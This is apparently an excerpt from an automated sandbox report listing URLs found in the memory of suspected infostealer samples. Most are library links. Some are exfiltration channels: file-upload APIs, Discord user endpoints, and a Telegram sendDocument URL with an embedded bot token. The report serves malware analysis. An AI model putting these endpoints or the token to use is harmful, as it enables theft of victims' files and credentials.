Source: based.exe, 00000008.00000003.2115149912.000001F16D299000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: based.exe, 00000008.00000003.2079657457.000001F16D014000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2079441469.000001F16D280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftCONSM~1JSOy.
Source: based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftENCRYP~1JSOy.
Source: based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftNAV_CO~1.JSOy.
Source: based.exe, 00000008.00000003.2079441469.000001F16D280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: based.exe, 00000008.00000002.2802048410.000001F16D9C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: based.exe, 00000008.00000002.2802048410.000001F16D9CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr
Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: based.exe, 00000008.00000002.2801754901.000001F16D7BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7337890485:AAHJolyS1xe_Y4XOAIPHADM1TG5Ae02NIcU/sendDocument
Source: based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: iqA8j9yGcd.exe, 00000002.00000002.2029846639.0000021B8DF20000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799159126.000001F16CAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC98000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C868000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC98000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C868000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: iqA8j9yGcd.exe, 00000002.00000002.2029846639.0000021B8DEF0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799159126.000001F16CAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: iqA8j9yGcd.exe, 00000002.00000002.2029846639.0000021B8DEF0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799159126.000001F16CAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029635146.0000021B8C46D000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028367878.0000021B8C46C000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: based.exe, 00000008.00000002.2801663781.000001F16D5E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029611666.0000021B8C461000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028820443.0000021B8C45E000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2030262354.0000021B8E0F0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057005493.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2062517146.000002471A396000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2063800528.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057088286.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067150043.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2061298138.000002471A384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC98000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C868000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067655551.000002471BFCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: hacn.exe, 00000009.00000003.2057226169.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029611666.0000021B8C461000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028820443.0000021B8C45E000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2030262354.0000021B8E0F0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057005493.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2062517146.000002471A396000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2063800528.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057088286.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067150043.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2061298138.000002471A384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: based.exe, 00000008.00000003.2084663768.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2085717037.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799664583.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16D039000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2083667993.000001F16CDBE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178559256.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2264289292.000001F16D031000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D036000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2153958230.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181849798.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152605175.000001F16D03B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2081670732.000001F16D4D0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796193966.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029611666.0000021B8C461000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028820443.0000021B8C45E000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2030262354.0000021B8E0F0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057005493.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2062517146.000002471A396000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2063800528.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057088286.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067150043.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2061298138.000002471A384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: based.exe, 00000008.00000002.2801663781.000001F16D5E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: based.exe, 00000008.00000002.2801268100.000001F16D4EE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D565000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D55E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799246935.000001F16CCE4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: based.exe, 00000008.00000002.2801268100.000001F16D4EE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D565000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D55E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: based.exe, 00000008.00000003.2112491572.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: based.exe, 00000008.00000003.2112491572.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799664583.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16D039000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178559256.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2264289292.000001F16D031000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D036000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2153958230.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181849798.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152605175.000001F16D03B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796193966.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: based.exe, 00000008.00000002.2799246935.000001F16CCE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: based.exe, 00000008.00000003.2143028640.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: based.exe, 00000008.00000002.2802891309.000001F16E63C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: based.exe, 00000008.00000003.2067718657.000001F16CF2E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2069014031.000001F16CF2F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2070735469.000001F16CF2F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2060409720.000001F16CF2E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799365903.000001F16CDE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: based.exe, 00000008.00000002.2805857266.00007FF8A8CCB000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: hacn.exe, 00000009.00000002.2070711669.00007FF8A882F000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: based.exe, 00000008.00000003.2164958998.000001F16D375000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152336872.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D375000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2114865202.000001F16D40B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123018744.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2114865202.000001F16D40B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181348385.000001F16D30A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2196755499.000001F16D3A3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2129617566.000001F16D5D3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: based.exe, 00000008.00000003.2776626857.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2262634216.000001F16D39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2797041633.000001F16D39B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152336872.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D38B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800463208.000001F16D3A3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2114865202.000001F16D40B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123018744.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2196755499.000001F16D3A3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2205245063.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181348385.000001F16D30A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: based.exe, 00000008.00000002.2799454783.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16CEF1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
